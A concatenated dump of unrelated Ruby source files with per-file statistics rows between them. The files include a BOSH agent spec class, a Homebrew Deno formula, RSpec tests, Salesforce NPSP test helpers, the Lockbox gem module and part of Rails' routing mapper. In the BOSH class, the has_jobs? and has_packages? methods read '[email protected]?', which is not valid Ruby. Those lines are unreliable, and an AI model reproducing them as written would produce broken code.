package_specs = spec["packages"]
# By default stemcell VM has '' as job
# in state.yml, handling this very special case
if job_spec && job_spec != ""
job_name = job_spec["name"]
if is_legacy_spec?(job_spec)
@jobs << Job.new(job_name, job_spec["template"], job_spec,
@config_binding)
else
job_spec["templates"].each do |template_spec|
@jobs << Job.new(job_name, template_spec["name"], template_spec,
@config_binding)
end
end
end
if package_specs
unless package_specs.is_a?(Hash)
raise ArgumentError, "Invalid package specs format " +
"in apply spec, Hash expected " +
"#{package_specs.class} given"
end
package_specs.each_pair do |package_name, package_spec|
@packages << Package.new(package_spec)
end
end
end
def is_legacy_spec?(job_spec)
return job_spec["template"] && !job_spec["templates"]
end
def has_jobs?
[email protected]?
end
def has_packages?
[email protected]?
end
# TODO: figure out why it has to be an apply marker
def configured?
@spec.key?("configuration_hash")
end
def install_jobs
@jobs.each do |job|
job.install
end
end
def install_packages
@jobs.each do |job|
@packages.each do |package|
package.install_for_job(job)
end
end
end
# Configure the 1+ job templates (job colocation)
# They are reversed for the purposes of ensuring monit
# starts them in the order that they are specified
# in the original deployment manifest
def configure_jobs
@jobs.reverse.each_with_index do |job, job_index|
job.configure(job_index)
end
end
end
end
end
| 26.561224 | 78 | 0.553208 |
f73d97bd2c86c57dc28d6bd192c6e6bf21cf7783 | 2,400 | class Deno < Formula
# Homebrew formula metadata: what Deno is and where to fetch its source.
desc "Secure runtime for JavaScript and TypeScript"
homepage "https://deno.land/"
url "https://github.com/denoland/deno/releases/download/v1.0.0/deno_src.tar.gz"
sha256 "89709f489e4cbbcfd6913d14e903fcb47c92f329d077477190b0dbd8bd23acc7"

# Pre-built binary bottles per macOS release.
bottle do
  cellar :any_skip_relocation
  rebuild 1
  sha256 "81f9460d523a17ef07486469e5f85709aa36cc16614bc5df24fe2e36ab150233" => :catalina
  sha256 "faa0baff031d4ed196065aa8b908603b55f1f4ec91cf1b3c0236840d74661c79" => :mojave
  sha256 "9675b67b91c25a48453a3256276a59df015b0232a4137802560cc439b556b4c0" => :high_sierra
end

depends_on "llvm" => :build
depends_on "ninja" => :build
depends_on "rust" => :build
depends_on :xcode => ["10.0", :build] # required by v8 7.9+
depends_on :macos # Due to Python 2 (see https://github.com/denoland/deno/issues/2893)

uses_from_macos "xz"

# gn (the build-file generator) is pinned to a specific revision and
# compiled from source during install.
resource "gn" do
  url "https://gn.googlesource.com/gn.git",
      :revision => "5ed3c9cc67b090d5e311e4bd2aba072173e82db9"
end

def install
  # Build gn from source (used as a build tool here)
  (buildpath/"gn").install resource("gn")
  cd "gn" do
    system "python", "build/gen.py"
    system "ninja", "-C", "out/", "gn"
  end

  # env args for building a release build with our clang, ninja and gn
  ENV["GN"] = buildpath/"gn/out/gn"
  # build rusty_v8 from source
  ENV["V8_FROM_SOURCE"] = "1"
  # overwrite Chromium minimum sdk version of 10.15
  ENV["FORCE_MAC_SDK_MIN"] = "10.13"
  # build with llvm and link against system libc++ (no runtime dep)
  ENV["CLANG_BASE_PATH"] = Formula["llvm"].prefix
  ENV.remove "HOMEBREW_LIBRARY_PATHS", Formula["llvm"].opt_lib

  # The actual deno binary is built by cargo from the cli/ crate.
  cd "cli" do
    system "cargo", "install", "-vv", "--locked", "--root", prefix, "--path", "."
  end

  # Install bash and zsh completion
  output = Utils.popen_read("#{bin}/deno completions bash")
  (bash_completion/"deno").write output
  output = Utils.popen_read("#{bin}/deno completions zsh")
  (zsh_completion/"_deno").write output
end

# Smoke test: run a local script, then fetch and run a remote module
# with read access restricted to the test directory.
test do
  (testpath/"hello.ts").write <<~EOS
    console.log("hello", "deno");
  EOS
  assert_match "hello deno", shell_output("#{bin}/deno run hello.ts")
  assert_match "console.log",
    shell_output("#{bin}/deno run --allow-read=#{testpath} https://deno.land/[email protected]/examples/cat.ts " \
                 "#{testpath}/hello.ts")
end
| 35.820896 | 109 | 0.6825 |
91b25915ec5463364a3df5408858c134ea979eee | 328 | require "brilliant/ast/node"
# AST node holding an ordered sequence of child statements.
class Brilliant::AST::CodeBlock < Brilliant::AST::Node
  attr_accessor :child_nodes

  def initialize(child_nodes)
    # NOTE(review): only the first element of the argument is kept —
    # presumably the parser wraps the statement list in an outer array.
    # Confirm against the grammar/callers.
    self.child_nodes = child_nodes.first
  end

  # Emit code for each child statement in order.
  def generate_code(mod, builder)
    child_nodes.each do |node|
      node.generate_code(mod, builder)
    end
  end
end
| 19.294118 | 54 | 0.737805 |
b94973ae97bd31777413606f87e5a1a5ee4c23e8 | 176 | class CreateStandards < ActiveRecord::Migration[5.1]
# Create the standards table with its two string columns.
def change
  create_table :standards do |table|
    table.string :standard_name
    table.string :identifier
  end
end
end
| 19.555556 | 52 | 0.693182 |
1d48c70acc9bc32b4cdfc4769d3bdeb4a7ff5458 | 581 | category_list = {
"furniture" => {
},
"fitness" => {
},
"automotive" => {
},
"children toys" => {
},
"entertainment" => {
},
"books" => {
},
"clothes" => {
},
"sports equipment" => {
},
"other" => {
}
}
# Persist one Category per name. The values in category_list are all empty
# hashes and were never used, so iterate the keys only (the unused
# `category_hash` block parameter is dropped).
category_list.each_key do |name|
  category = Category.new
  category.name = name
  category.save
end
post_type_list = {
"request" => {
},
"give away" => {
}
}
# Persist one PostType per description; the hash values are unused, so
# iterate the keys only (the unused `post_type_hash` parameter is dropped).
post_type_list.each_key do |description|
  post_type = PostType.new
  post_type.description = description
  post_type.save
end
ed0c7bdbcff145bda71c466bf559dd1a31c5e399 | 1,127 | RSpec.describe ReplyContract do
it "must have a comment" do
actual = ReplyContract.new.call({})
expect(actual.errors.to_h[:comment]).to include "is missing"
end
it "must have a comment greater than 3 characters" do
actual = ReplyContract.new.call(comment: "123")
expect(actual.errors.to_h[:comment]).to include "must be greater than 3 characters"
end
it "is success if the comment is valid" do
valid_post = instance_double(Post, id: "valid")
allow(Post).to receive(:find_by).and_return(valid_post)
actual = ReplyContract.new.call(required_params)
expect(actual).to be_success
end
it "must have a reply_post_id" do
actual = ReplyContract.new.call({})
expect(actual.errors.to_h[:reply_post_id]).to include "is missing"
end
it "must have a post with the given id" do
actual = ReplyContract.new.call(reply_post_id: "invalid")
expect(actual.errors.to_h[:reply_post_id]).to include "must exist"
end
def required_params
{
comment: "valid",
reply_post_id: "valid",
user_id: "valid",
username: "valid_username"
}
end
end
| 25.613636 | 87 | 0.69299 |
6a0e41b54cd12305a716545680b6144d073072b2 | 760 | require 'spec_helper'
require 'omnibus/manifest_entry'
module Omnibus
  describe Fetcher do
    let(:source_path) { '/local/path' }
    let(:project_dir) { '/project/dir' }
    let(:build_dir) { '/build/dir' }

    # Stand-in for a manifest entry pointing at a local-path source.
    let(:manifest_entry) do
      double(Software,
             name: 'software',
             locked_version: '31aedfs',
             locked_source: { path: source_path })
    end

    subject { described_class.new(manifest_entry, project_dir, build_dir) }

    describe "#initialize" do
      # Fixed typo in the example description ("resovled" -> "resolved").
      it "sets the resolved_version to the locked_version" do
        expect(subject.resolved_version).to eq("31aedfs")
      end

      it "sets the source to the locked_source" do
        expect(subject.source).to eq({ path: source_path })
      end
    end
  end
end
| 24.516129 | 75 | 0.648684 |
ed7bb597a68c2e53978c1a398d51a032a077473f | 1,405 | require 'spec_helper'
RSpec.describe MessagePolicy, type: :policy do
  # Default: anonymous visitor; each context below overrides :user.
  let(:user){ }
  let(:record){ create :message }

  subject{ MessagePolicy.new user, record }

  context 'without a user' do
    it_behaves_like 'a policy forbidding', :index, :show, :create, :update, :destroy
  end

  context 'with a user' do
    let(:user){ create :user }
    it_behaves_like 'a policy permitting', :index
    it_behaves_like 'a policy forbidding', :show, :create, :update, :destroy
  end

  context 'with a participant' do
    # The message's own author.
    let(:user){ record.user }
    it_behaves_like 'a policy permitting', :index, :show, :create
    it_behaves_like 'a policy forbidding', :update, :destroy
  end

  context 'with a moderator' do
    let(:user){ create :moderator, section: 'zooniverse' }
    it_behaves_like 'a policy permitting', :index, :show
    it_behaves_like 'a policy forbidding', :create, :update, :destroy
  end

  context 'with an admin' do
    let(:user){ create :admin, section: 'zooniverse' }
    it_behaves_like 'a policy permitting', :index, :show
    it_behaves_like 'a policy forbidding', :create, :update, :destroy
  end

  context 'with scope' do
    # The resolved scope must contain only the user's own messages,
    # never the other users' records created here.
    let!(:other_records){ create_list :message, 2 }
    let(:user){ create :user }
    let(:records){ create_list :message, 2, user: user }

    subject{ MessagePolicy::Scope.new(user, Message).resolve }

    it{ is_expected.to match_array records }
  end
end
| 31.222222 | 84 | 0.688968 |
ed340919286a4231d98e3735de1bf95e0e9f8777 | 163 | require "test_helper"
class UserTest < ActiveSupport::TestCase
  test "random_password" do
    # random_password(n) must return an n-character password.
    # assert_equal reports both values on failure, unlike the original
    # bare boolean assert (whose local was also misleadingly named `pw`
    # while actually holding a length).
    assert_equal 10, User.random_password(10).length
  end
end
| 18.111111 | 40 | 0.723926 |
e8f47b30b78eecfce630eb5b11d0b8c9626607f0 | 1,648 | # -*- encoding: utf-8 -*-
# stub: sprockets-rails 2.3.3 ruby lib
# NOTE: this is a RubyGems-generated gemspec stub (see the "# stub:" header
# above); it is normally regenerated rather than edited by hand.
Gem::Specification.new do |s|
  s.name = "sprockets-rails".freeze
  s.version = "2.3.3"

  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib".freeze]
  s.authors = ["Joshua Peek".freeze]
  s.date = "2015-09-08"
  s.email = "[email protected]".freeze
  s.homepage = "https://github.com/rails/sprockets-rails".freeze
  s.licenses = ["MIT".freeze]
  s.rubygems_version = "3.1.2".freeze
  s.summary = "Sprockets Rails integration".freeze

  s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version

  if s.respond_to? :specification_version then
    s.specification_version = 4
  end

  # Declare dependencies through whichever API the running RubyGems supports;
  # very old RubyGems only has the untyped add_dependency.
  if s.respond_to? :add_runtime_dependency then
    s.add_runtime_dependency(%q<sprockets>.freeze, [">= 2.8", "< 4.0"])
    s.add_runtime_dependency(%q<actionpack>.freeze, [">= 3.0"])
    s.add_runtime_dependency(%q<activesupport>.freeze, [">= 3.0"])
    s.add_development_dependency(%q<railties>.freeze, [">= 3.0"])
    s.add_development_dependency(%q<rake>.freeze, [">= 0"])
    s.add_development_dependency(%q<sass>.freeze, [">= 0"])
    s.add_development_dependency(%q<uglifier>.freeze, [">= 0"])
  else
    s.add_dependency(%q<sprockets>.freeze, [">= 2.8", "< 4.0"])
    s.add_dependency(%q<actionpack>.freeze, [">= 3.0"])
    s.add_dependency(%q<activesupport>.freeze, [">= 3.0"])
    s.add_dependency(%q<railties>.freeze, [">= 3.0"])
    s.add_dependency(%q<rake>.freeze, [">= 0"])
    s.add_dependency(%q<sass>.freeze, [">= 0"])
    s.add_dependency(%q<uglifier>.freeze, [">= 0"])
  end
end
| 39.238095 | 112 | 0.662621 |
218476f4341b0b1bccd7738b650b3980a516d0c6 | 2,173 | # frozen_string_literal: true
control 'V-75515' do
# STIG control: require a file-integrity tool (AIDE) on Ubuntu.
# The multi-line title/desc strings below are kept byte-exact because their
# content is part of the published control text.
title "A file integrity tool must be installed to verify correct operation of
all security functions in the Ubuntu operating system."
desc "Without verification of the security functions, security functions may
not operate correctly and the failure may go unnoticed. Security function is
defined as the hardware, software, and/or firmware of the information system
responsible for enforcing the system security policy and supporting the
isolation of code and data on which the protection is based. Security
functionality includes, but is not limited to, establishing system accounts,
configuring access authorizations (i.e., permissions, privileges), setting
events to be audited, and setting intrusion detection parameters.
This requirement applies to Ubuntu operating systems performing security
function verification/testing and/or systems and environments that require this
functionality.
"
impact 0.5
tag "gtitle": 'SRG-OS-000445-GPOS-00199'
tag "gid": 'V-75515'
tag "rid": 'SV-90195r3_rule'
tag "stig_id": 'UBTU-16-010500'
tag "fix_id": 'F-82143r1_fix'
tag "cci": ['CCI-002696']
tag "nist": ['SI-6 a', 'Rev_4']
tag "false_negatives": nil
tag "false_positives": nil
tag "documentable": false
tag "mitigations": nil
tag "severity_override_guidance": false
tag "potential_impacts": nil
tag "third_party_tools": nil
tag "mitigation_controls": nil
tag "responsibility": nil
tag "ia_controls": nil
desc 'check', "Verify that Advanced Intrusion Detection Environment (AIDE) is
installed and verifies the correct operation of all security functions.
Check that the AIDE package is installed with the following command:
# sudo apt list aide
aide/xenial,now 0.16~a2.git20130520-3 amd64 [installed]
If AIDE is not installed, ask the System Administrator how file integrity
checks are performed on the system.
If there is no application installed to perform integrity checks, this is a
finding."
desc 'fix', "Install the AIDE package by running the following command:
# sudo apt-get install aide"
# Automated check: the control passes when the aide package is present.
describe package('aide') do
it { should be_installed }
end
end
| 36.830508 | 79 | 0.769903 |
ed1419e677800fc151eecdd2ecc06a35fd6f76fc | 10,356 | module Sfdo_api_npsp
# NPSP will automatically create certain fields on certain objects based on required input values for those records.
# There is no way to know in advance from the API which these are, so we find them empirically and note them here
# before calling the create() method in SfdoAPI
@fields_acceptibly_nil = { 'Contact': ['Name'],
                           'Opportunity': ['ForecastCategory'] }

# ---- Record creation helpers ------------------------------------------------
# These build Salesforce records through the SfdoAPI `create`/`select_api`
# helpers and stash the resulting Ids in instance variables for later steps.

# Creates a Household-record-type Account; remembers its Id in @account_id.
def create_account_via_api(account_name)
  record_type_id = select_api "select Id from RecordType where DeveloperName = 'HH_Account'"
  @account_id = create 'Account', Name: account_name, RecordTypeId: record_type_id.first.Id
end

# Creates an Organization-record-type Account; remembers its Id in @account_id.
def create_organization_account(account_name)
  # record_type_id = select_api "select Id from RecordType where DeveloperName = 'HH_Account'"
  record_type_id = select_api "select Id from RecordType where DeveloperName = 'Organization'"
  @account_id = create 'Account', Name: account_name, RecordTypeId: record_type_id.first.Id
end

# Creates a Contact (with optional mailing address), records the Contact Id,
# the Id of its auto-created Account, and appends to @array_of_contacts.
def create_contact_via_api(client_name, street = '', city = '', state = '', country = '', zip = '')
  @contact_id = create 'Contact', LastName: client_name,
                       MailingStreet: street,
                       MailingCity: city,
                       MailingState: state,
                       MailingCountry: country,
                       MailingPostalCode: zip
  @contact_name = client_name
  account_object = select_api "select AccountId from Contact where Id = '#{@contact_id}'"
  my_account_object = account_object.first
  @account_id_for_contact = my_account_object.AccountId
  @array_of_contacts << @contact_id
end

# Creates two Contacts that share one Account (the Account auto-created for
# the first Contact is reused for the second).
def create_two_contacts_on_account_via_api(client_name1, client_name2)
  @contact_id = create 'Contact', LastName: client_name1
  @contact_name = client_name1
  @array_of_contact_names << client_name1
  account_object = select_api "select AccountId from Contact where Id = '#{@contact_id}'"
  my_account_object = account_object.first
  @account_id_for_contact = my_account_object.AccountId
  @array_of_contacts << @contact_id
  @contact_id = create 'Contact', LastName: client_name2, AccountId: @account_id_for_contact
  @contact_name = client_name2
  @array_of_contact_names << client_name2
  @array_of_contacts << @contact_id
end

# Creates two Contacts, each on its own auto-created Account.
# NOTE(review): @array_of_contacts receives @contact_id_first twice and never
# @contact_id_second — looks like a copy/paste slip; confirm before relying
# on the array's contents.
def create_two_contacts_on_different_accounts(client_name1, client_name2)
  @contact_id_first = create 'Contact', LastName: client_name1
  @contact_name_first = client_name1
  @array_of_contact_names << client_name1
  account_object = select_api "select AccountId from Contact where Id = '#{@contact_id_first}'"
  my_account_object = account_object.first
  @account_id_for_first_contact = my_account_object.AccountId
  @array_of_contacts << @contact_id_first
  @contact_id_second = create 'Contact', LastName: client_name2
  @contact_name_second = client_name2
  @array_of_contact_names << client_name2
  account_object = select_api "select AccountId from Contact where Id = '#{@contact_id_second}'"
  my_account_object = account_object.first
  @account_id_for_second_contact = my_account_object.AccountId
  @array_of_contacts << @contact_id_first
end

# Creates a Household object plus two Contacts attached to it (the second
# also gets a MailingCity).
# NOTE(review): both Contacts use the same last name on purpose? The
# commented-out lines show the pre-namespace-translation field names.
def create_contacts_with_household_object_via_api(hh_obj, contact_name)
  @hh_obj_id = create 'Household', Name: hh_obj
  #@contact_id = create 'Contact', { LastName: contact_name, Household: @hh_obj_id }
  @contact_id = create 'Contact', { LastName: contact_name, Household: @hh_obj_id }
  @array_of_contacts << @contact_id
  #@contact_id = create 'Contact', LastName: contact_name, MailingCity: 'hhmailingcity', npo02__Household__c: @hh_obj_id
  @contact_id = create 'Contact', LastName: contact_name, MailingCity: 'hhmailingcity', Household: @hh_obj_id
  @array_of_contacts << @contact_id
end

# Writes the given role into the org's Household Settings soft-credit roles.
def populate_soft_credit(role)
  api_client do
    hs_id = select_api 'select Id from Households_Settings'
    hs = hs_id.first
    hs.npo02__Soft_Credit_Roles__c = role
    @sc_id = update_api(hs)
  end
end

def create_gau_via_api(gau_name)
  @gau_id = create 'General_Accounting_Unit', Name: gau_name
end

def create_lead_via_api(last_name, company)
  @lead_id = create 'Lead', LastName: last_name, Company: company
end

# Creates an Opportunity on the Account of the most recently created Contact
# (@account_id_for_contact); the account_id parameter is accepted but unused.
def create_opportunity_via_api(client_name, stage_name, close_date, amount, account_id, matching_gift_status = '', matching_gift_account = '')
  @opportunity_id = create 'Opportunity',
                           Name: client_name,
                           StageName: stage_name,
                           CloseDate: close_date,
                           Amount: amount.to_i,
                           AccountId: @account_id_for_contact,
                           Matching_Gift_Status: matching_gift_status,
                           Matching_Gift_Account: matching_gift_account
  @array_of_opp_ids << @opportunity_id
end

# NOTE(review): "@relationshiop_id" is a typo for "@relationship_id"; kept
# as-is because step definitions elsewhere may read the misspelled ivar.
def create_relationship_via_api(contact, related_contact)
  #@relationshiop_id = create 'Relationship', npe4__Contact__c: contact, npe4__RelatedContact__c: related_contact
  @relationshiop_id = create 'Relationship', Contact: contact, RelatedContact: related_contact
end

# ---- Record cleanup helpers -------------------------------------------------

def delete_account_via_api
  delete_one_account(@account_id)
end

def delete_contacts_via_api
  api_client do
    cons = select_api 'select Id from Contact'
    delete_all_contact(cons)
  end
end

def delete_engagement_plan_templates
  api_client do
    epts = select_api 'select Id from Engagement_Plan_Template'
    delete_all_Engagement_Plan_Template(epts)
  end
end

def delete_gaus_via_api
  api_client do
    gaus = select_api 'select Id from General_Accounting_Unit'
    delete_all_General_Accounting_Unit(gaus)
  end
end

# Household accounts are destroyed one by one instead of via delete_all_*.
def delete_household_accounts
  api_client do
    hh_accs = select_api "select Id from Account where Type = 'Household'"
    hh_accs.each do |hh_acc|
      @api_client.destroy(hh_acc.sobject_type, hh_acc.Id)
    end
  end
end

def delete_household_objects
  api_client do
    hh_objs = select_api 'select Id from Household'
    delete_all_Household(hh_objs)
  end
end

def delete_leads
  api_client do
    leads = select_api 'select Id from Lead'
    leads.each do |lead_id|
      @api_client.destroy(lead_id.sobject_type, lead_id.Id)
    end
  end
end

def delete_payments
  api_client do
    payments = select_api 'select Id from OppPayment'
    delete_all_OppPayment(payments)
  end
end

def delete_non_household_accounts
  api_client do
    nh_accs = select_api 'select Id from Account where Type = null'
    delete_all_account(nh_accs)
  end
end

def delete_opportunities
  api_client do
    rd_opps = select_api 'select Id from Opportunity'
    delete_all_opportunity(rd_opps)
  end
end

def delete_recurring_donations
  api_client do
    rds = select_api 'select Id from Recurring_Donation'
    delete_all_Recurring_Donation(rds)
  end
end

# ---- Org settings and session helpers ---------------------------------------

# Switches the org's account model (npe01__Account_Processor__c) to to_value.
def update_account_model(to_value)
  api_client do
    acc_id = select_api 'select Id from Contacts_And_Orgs_Settings'
    acc = acc_id.first
    #THIS NEEDS A CHANGE TO SFDO-API TO SEND THESE VALUES THROUGH true_field()
    acc.npe01__Account_Processor__c = to_value
    update_api(acc)
  end
end

def reset_these_settings(these_settings_obj)
  @api_client.update_api(these_settings_obj)
end

# Derives $target_org_url (Visualforce host) and $object_namespace from the
# org instance URL, depending on whether the code under test is unmanaged,
# on gs0, or (default) managed in a dev org.
def set_url_and_object_namespace_to_npsp
  # Not sure why this is required here, but $instance_url isn't being set elsewhere all times this is called
  if not $instance_url and ENV['SF_INSTANCE_URL']
    $instance_url = ENV['SF_INSTANCE_URL']
  end
  case ENV['TARGET_ORG']
  when 'unmanaged'
    if $instance_url.include? "my.salesforce.com"
      $target_org_url = $instance_url.gsub(/https:\/\/([\w-]+)\.(\w+)\.my.salesforce.com/, 'https://\1--c.\2.visual.force.com')
    else
      interim_url = $instance_url.sub('https://', 'https://c.')
      # NOTE(review): the next assignment is immediately overwritten by the
      # one after it (interim_url never contains "my.salesforce.com" in this
      # branch) — looks like a dead store; confirm intent.
      $target_org_url = interim_url.sub('my.salesforce.com', 'visual.force.com')
      $target_org_url = interim_url.sub('salesforce.com', 'visual.force.com')
    end
    $object_namespace = ''
  when 'gs0'
    $target_org_url = $instance_url.sub('gs0.salesforce.com', 'npsp.gus.visual.force.com')
    $object_namespace = 'npsp__'
  else
    #THE MOST COMMON CASE, MANAGED CODE IN A DEVELOPMENT ORG
    # MyDomain example: https://ability-momentum-7120-dev-ed.cs70.my.salesforce.com
    # becomes: https://ability-momentum-7120-dev-ed--npsp.cs70.visual.force.com
    # Pod example: https://na35.salesforce.com
    # becomes: https://npsp.na35.salesforce.com
    if $instance_url.include? "my.salesforce.com"
      $target_org_url = $instance_url.gsub(/https:\/\/([\w-]+)\.(\w+)\.my.salesforce.com/, 'https://\1--npsp.\2.visual.force.com')
    else
      interim_url = $instance_url.sub('https://', 'https://npsp.')
      # NOTE(review): same double-assignment pattern as above; the first
      # result is discarded.
      $target_org_url = interim_url.sub('my.salesforce.com', 'visual.force.com')
      $target_org_url = interim_url.sub('salesforce.com', 'visual.force.com')
    end
    $object_namespace = 'npsp__'
  end
end

# Obtains an access token (from the environment, or via an OAuth
# refresh-token exchange) and logs the browser in through frontdoor.jsp.
def login_with_oauth
  require 'faraday'
  if ENV['SF_ACCESS_TOKEN'] and ENV['SF_INSTANCE_URL']
    $instance_url = ENV['SF_INSTANCE_URL']
    @access_token = ENV['SF_ACCESS_TOKEN']
  else
    conn = Faraday.new(url: ENV['SF_SERVERURL']) do |faraday|
      faraday.request :url_encoded # form-encode POST params
      # faraday.response :logger # log requests to STDOUT
      faraday.adapter Faraday.default_adapter # make requests with Net::HTTP
    end
    response = conn.post '/services/oauth2/token',
                         grant_type: 'refresh_token',
                         client_id: ENV['SF_CLIENT_KEY'],
                         client_secret: ENV['SF_CLIENT_SECRET'],
                         refresh_token: ENV['SF_REFRESH_TOKEN']
    response_body = JSON.parse(response.body)
    @access_token = response_body['access_token']
    $instance_url = response_body['instance_url']
  end
  @browser.goto($instance_url + '/secur/frontdoor.jsp?sid=' + @access_token)
end
end
| 39.079245 | 144 | 0.685689 |
e9be47abb294941362535706758db9cd85e88f4a | 2,697 | # stdlib
require "base64"
require "openssl"
require "securerandom"
# modules
require "lockbox/box"
require "lockbox/calculations"
require "lockbox/encryptor"
require "lockbox/key_generator"
require "lockbox/io"
require "lockbox/migrator"
require "lockbox/model"
require "lockbox/padding"
require "lockbox/utils"
require "lockbox/version"
# integrations
require "lockbox/carrier_wave_extensions" if defined?(CarrierWave)
require "lockbox/railtie" if defined?(Rails)
if defined?(ActiveSupport)
  require "lockbox/log_subscriber"
  Lockbox::LogSubscriber.attach_to :lockbox

  # Defer framework integration until the host library is actually loaded.
  ActiveSupport.on_load(:active_record) do
    extend Lockbox::Model
    extend Lockbox::Model::Attached
    ActiveRecord::Calculations.prepend Lockbox::Calculations
  end

  ActiveSupport.on_load(:mongoid) do
    Mongoid::Document::ClassMethods.include(Lockbox::Model)
  end
end
# Top-level namespace and public API for the Lockbox encryption library.
module Lockbox
  class Error < StandardError; end
  class DecryptionError < Error; end
  class PaddingError < Error; end

  autoload :Audit, "lockbox/audit"

  extend Padding

  class << self
    attr_accessor :default_options
    attr_writer :master_key
  end
  self.default_options = {}

  # Master key, defaulting to the LOCKBOX_MASTER_KEY environment variable.
  def self.master_key
    @master_key ||= ENV["LOCKBOX_MASTER_KEY"]
  end

  # Re-encrypts records in batches; restart: true starts over from scratch.
  def self.migrate(relation, batch_size: 1000, restart: false)
    Migrator.new(relation, batch_size: batch_size).migrate(restart: restart)
  end

  # Rotates the keys for the given attributes across the relation.
  def self.rotate(relation, batch_size: 1000, attributes:)
    Migrator.new(relation, batch_size: batch_size).rotate(attributes: attributes)
  end

  # 32 random bytes, hex-encoded (64 hex chars).
  def self.generate_key
    SecureRandom.hex(32)
  end

  # Generates an X25519 key pair for hybrid encryption (requires rbnacl).
  def self.generate_key_pair
    require "rbnacl"
    # encryption and decryption servers exchange public keys
    # this produces smaller ciphertext than sealed box
    alice = RbNaCl::PrivateKey.generate
    bob = RbNaCl::PrivateKey.generate
    # alice is sending message to bob
    # use bob first in both cases to prevent keys being swappable
    {
      encryption_key: to_hex(bob.public_key.to_bytes + alice.to_bytes),
      decryption_key: to_hex(bob.to_bytes + alice.public_key.to_bytes)
    }
  end

  # Derives a per-table/per-attribute key from the master key.
  # Raises ArgumentError when no master key is configured or passed.
  def self.attribute_key(table:, attribute:, master_key: nil, encode: true)
    master_key ||= Lockbox.master_key
    raise ArgumentError, "Missing master key" unless master_key

    key = Lockbox::KeyGenerator.new(master_key).attribute_key(table: table, attribute: attribute)
    key = to_hex(key) if encode
    key
  end

  # Hex-encodes a binary string.
  def self.to_hex(str)
    str.unpack("H*").first
  end

  # Lockbox.new(...) returns an Encryptor, not a Lockbox instance.
  def self.new(**options)
    Encryptor.new(**options)
  end

  # Opt ActionText rich-text bodies into encryption once ActionText loads.
  def self.encrypts_action_text_body(**options)
    ActiveSupport.on_load(:action_text_rich_text) do
      ActionText::RichText.encrypts :body, **options
    end
  end
end
| 25.685714 | 97 | 0.742677 |
ff325afc54e38ff86a1f1f6b129c143121190eb9 | 78,063 | # frozen_string_literal: true
require "active_support/core_ext/hash/slice"
require "active_support/core_ext/enumerable"
require "active_support/core_ext/array/extract_options"
require "active_support/core_ext/regexp"
require "action_dispatch/routing/redirection"
require "action_dispatch/routing/endpoint"
module ActionDispatch
module Routing
class Mapper
URL_OPTIONS = [:protocol, :subdomain, :domain, :host, :port]
# Wraps a rack app/dispatcher with the route's constraint objects; the
# request is only served when every constraint matches.
class Constraints < Routing::Endpoint #:nodoc:
  attr_reader :app, :constraints

  # Strategy lambdas: SERVE for Rails dispatchers, CALL for plain rack apps.
  SERVE = ->(app, req) { app.serve req }
  CALL = ->(app, req) { app.call req.env }

  def initialize(app, constraints, strategy)
    # Unwrap Constraints objects. I don't actually think it's possible
    # to pass a Constraints object to this constructor, but there were
    # multiple places that kept testing children of this object. I
    # *think* they were just being defensive, but I have no idea.
    if app.is_a?(self.class)
      constraints += app.constraints
      app = app.app
    end

    @strategy = strategy

    @app, @constraints, = app, constraints
  end

  def dispatcher?; @strategy == SERVE; end

  # A constraint may implement matches?(req) or be a callable taking
  # either the request or (path_parameters, request) — see constraint_args.
  def matches?(req)
    @constraints.all? do |constraint|
      (constraint.respond_to?(:matches?) && constraint.matches?(req)) ||
        (constraint.respond_to?(:call) && constraint.call(*constraint_args(constraint, req)))
    end
  end

  # 404 with X-Cascade: pass lets the router try the next matching route.
  def serve(req)
    return [ 404, { "X-Cascade" => "pass" }, [] ] unless matches?(req)

    @strategy.call @app, req
  end

  private
    def constraint_args(constraint, request)
      constraint.arity == 1 ? [request] : [request.path_parameters, request]
    end
end
# Builds a single Journey::Route from the DSL-level pieces of a route
# definition (path AST, scope, options, constraints, defaults).
# The only code change vs. the original is restoring the condition
# `!@requirements.key?(:action)`, which had been mangled into an
# email-like token by an automated redaction pass.
class Mapping #:nodoc:
  ANCHOR_CHARACTERS_REGEX = %r{\A(\\A|\^)|(\\Z|\\z|\$)\Z}
  OPTIONAL_FORMAT_REGEX = %r{(?:\(\.:format\)+|\.:format|/)\Z}

  attr_reader :requirements, :defaults
  attr_reader :to, :default_controller, :default_action
  attr_reader :required_defaults, :ast

  def self.build(scope, set, ast, controller, default_action, to, via, formatted, options_constraints, anchor, options)
    options = scope[:options].merge(options) if scope[:options]

    defaults = (scope[:defaults] || {}).dup
    scope_constraints = scope[:constraints] || {}

    new set, ast, defaults, controller, default_action, scope[:module], to, formatted, scope_constraints, scope[:blocks] || [], via, options_constraints, anchor, options
  end

  # Raises when `match` is used without an HTTP verb.
  def self.check_via(via)
    if via.empty?
      msg = "You should not use the `match` method in your router without specifying an HTTP method.\n" \
            "If you want to expose your action to both GET and POST, add `via: [:get, :post]` option.\n" \
            "If you want to expose your action to GET, use `get` in the router:\n" \
            "  Instead of: match \"controller#action\"\n" \
            "  Do: get \"controller#action\""
      raise ArgumentError, msg
    end
    via
  end

  # Appends the (optional) format segment to the normalized path.
  def self.normalize_path(path, format)
    path = Mapper.normalize_path(path)

    if format == true
      "#{path}.:format"
    elsif optional_format?(path, format)
      "#{path}(.:format)"
    else
      path
    end
  end

  def self.optional_format?(path, format)
    format != false && path !~ OPTIONAL_FORMAT_REGEX
  end

  def initialize(set, ast, defaults, controller, default_action, modyoule, to, formatted, scope_constraints, blocks, via, options_constraints, anchor, options)
    @defaults = defaults
    @set = set

    @to = to
    @default_controller = controller
    @default_action = default_action
    @ast = ast
    @anchor = anchor
    @via = via
    @internal = options.delete(:internal)

    path_params = ast.find_all(&:symbol?).map(&:to_sym)

    options = add_wildcard_options(options, formatted, ast)

    options = normalize_options!(options, path_params, modyoule)

    split_options = constraints(options, path_params)

    constraints = scope_constraints.merge Hash[split_options[:constraints] || []]

    if options_constraints.is_a?(Hash)
      # Hash constraints may carry URL defaults (host, port, ...) too.
      @defaults = Hash[options_constraints.find_all { |key, default|
        URL_OPTIONS.include?(key) && (String === default || Integer === default)
      }].merge @defaults
      @blocks = blocks
      constraints.merge! options_constraints
    else
      @blocks = blocks(options_constraints)
    end

    requirements, conditions = split_constraints path_params, constraints
    verify_regexp_requirements requirements.map(&:last).grep(Regexp)

    formats = normalize_format(formatted)

    @requirements = formats[:requirements].merge Hash[requirements]
    @conditions = Hash[conditions]
    @defaults = formats[:defaults].merge(@defaults).merge(normalize_defaults(options))

